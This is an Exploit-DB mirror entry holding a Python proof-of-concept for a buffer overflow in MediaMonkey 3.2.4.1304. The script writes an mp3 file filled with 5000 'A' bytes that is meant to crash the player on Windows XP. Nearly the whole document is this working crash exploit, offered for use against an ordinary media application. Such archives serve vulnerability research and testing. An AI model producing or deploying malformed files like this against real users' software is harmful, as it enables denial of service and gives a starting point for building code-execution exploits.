exploit-db-mirror/exploits/windows/dos/15669.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
417 B
Python
Executable file

# Exploit Title: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC
# Date: 12/04/2010
# Author: 0v3r
# Software Link: http://www.mediamonkey.com/download/?dir=download
# Version: 3.2.4.1304
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
buff = "\x41" * 5000
try:
f = open("exploit.mp3",'w')
f.write(buff)
f.close()
print "[-] File created!\n"
except:
print "[-] Error occured!\n"